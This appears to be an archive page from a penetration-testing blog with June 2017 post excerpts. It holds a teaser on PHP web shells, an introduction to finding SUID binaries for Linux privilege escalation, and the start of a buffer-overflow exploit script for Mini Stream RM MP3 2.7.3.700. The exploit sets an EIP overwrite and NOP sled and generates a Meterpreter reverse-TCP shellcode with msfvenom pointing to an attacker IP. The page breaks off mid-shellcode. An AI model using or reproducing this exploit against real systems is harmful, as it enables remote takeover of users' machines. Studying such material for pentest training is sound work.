Skip to main content

Posts

Showing posts from June, 2017

Simple PHP Web Shells

This tutorial should be used for educational purpose only. I won't be responsible if you misuse this techniques and get yourself in trouble. During pentest activities I have noticed that there are multiple ways to execute system commands in php. This comes handy if something is blocked / blacklisted.  Here are few simple one liner web shells

Linux Privilege Escalation : SUID Binaries

After my OSCP Lab days are over I decided to do a little research and learn more on Privilege Escalation as it is my weak area.So over some series of blog post I am going to share with you some information of what I have learnt so far. The methods mentioned over here are not my own. This is something what I have learnt by reading articles, blogs and solving CTFs SUID - Set User ID The binaries which has suid enabled, runs with elevated privileges. Suppose you are logged in as non root user, but this suid bit enabled binaries can run with root privileges. How does a SUID Bit enable binary looks like ? -r- s r-x---  1 hack-me-bak-cracked hack-me-bak         7160 Aug 11  2015 bak How to find all the SUID enabled binaries ? hack-me-bak2@challenge02:~$ find / -perm -u=s 2>/dev/null /bin/su /bin/fusermount /bin/umount /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/bin/gpasswd /usr/bin/newgrp /usr/bin

Mini Stream RM MP3 2.7.3.700 Buffer Overflow

# Exploit Title: Mini Stream RM MP3 2.7.3.700 Buffer Overflow # Date: 31.05.2017 # Exploit Author: Dibyendu Sikdar (dibsyhex) # Vendor Homepage: http://www.downloadsource.net/5318/Mini-stream-RM-MP3-Converter-Easy-RM-to-MP3-Converter/ # Software Link: https://www.exploit-db.com/apps/1bbf03ec57b1ad30970362518e073215-Mini-streamRM-MP3Converter.exe # Version: 2.7.3.700 # Tested on: Windows 7 Home Basic 32 bit # Save the file as exploit.py # Run the code as python exploit.py # It will create a file with the exploit called play.m3u # Run a meterpreter handler in attacker system # Start the application. Select load. Select filetype as playlist. Open the play.m3u file #EIP = 1001B058 [ using PUSH ESP, RETN ] head = "A" * 35055 nop = "\x90" * 60 eip = "\x58\xB0\x01\x10" # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.30.130 LPORT=443 -f c -b "\x00\x0a\x0d" shell = ("\xd9\xc0\xd9\x74\x24\xf4\x5f\xb8\xad\xaf\xba\x08\x31\xc9\xb1"